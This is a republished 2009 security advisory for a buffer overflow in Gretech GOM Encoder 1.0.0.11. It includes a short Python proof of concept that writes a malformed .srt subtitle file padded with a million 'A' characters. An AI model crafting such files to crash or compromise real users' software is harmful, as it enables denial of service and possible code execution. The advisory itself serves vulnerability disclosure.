No account yet?
Home » Exploits » Gretech GOM Encoder '.srt' File Remote Buffer Overflow Vulnerability
Gretech GOM Encoder '.srt' File Remote Buffer Overflow Vulnerability E-mail
Feeds - Exploits
Written by Mai Xuan Cuong, Bkis   
Tuesday, 17 March 2009 21:45
Gretech GOM Encoder  '.srt' File Remote Buffer Overflow Vulnerability


-\\Bugtraq ID:
34120

-\\Class:
Boundary Condition Error

-\\CVE:


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Mar 16 2009 12:00AM

-\\Updated:
Mar 17 2009 06:16PM

-\\Credit:
Mai Xuan Cuong, Bkis



-\\Vulnerable:
Gretech GOM Encoder  1.0.0.11



-\\Discussion
Gretech GOM Encoder is prone to a remote buffer-overflow vulnerability because the application fails to perform
adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will
cause denial-of-service conditions.

GOM Encoder 1.0.0.11 and prior are vulnerable; other versions may also be affected.



-\\Exploit(s)/PoC(s):
Currently we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent
information, please mail us at: This e-mail address is being protected from spambots. You need JavaScript enabled to view it .

The following proof of concept is available:

===============================================================
34120-PoC.py
^^^^^^^^^^^^^
#exploit.py
#
# Gom Encoder (Subtitle File) Buffer Overflow PoC
# by :Encrypt3d.M!nd
#
#  Orignal Advisory:
#  http://www.securityfocus.com/bid/34120
#

chars = 'A' * 1000000

file = open ( 'devil_inside.srt', 'w' )
file.write ('1\n00:00:00,001 --> 00:00:06,000\n'+chars)
file.close()





-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more
recent information, please mail us at: This e-mail address is being protected from spambots. You need JavaScript enabled to view it .



-\\References(s)
--GOM Encoder Homepage
http://www.gomlab.com/eng/GE_Introduction.htm  (Gretech)
--[Bkis-04-2009] GOM Encoder Heap-based Buffer Overflow
http://www.securityfocus.com/archive/1/50184  ("Bkis" < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >)
--GOM Encoder Heap-based Buffer Overflow
http://security.bkis.vn/?p=35  (Bkis)
 

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff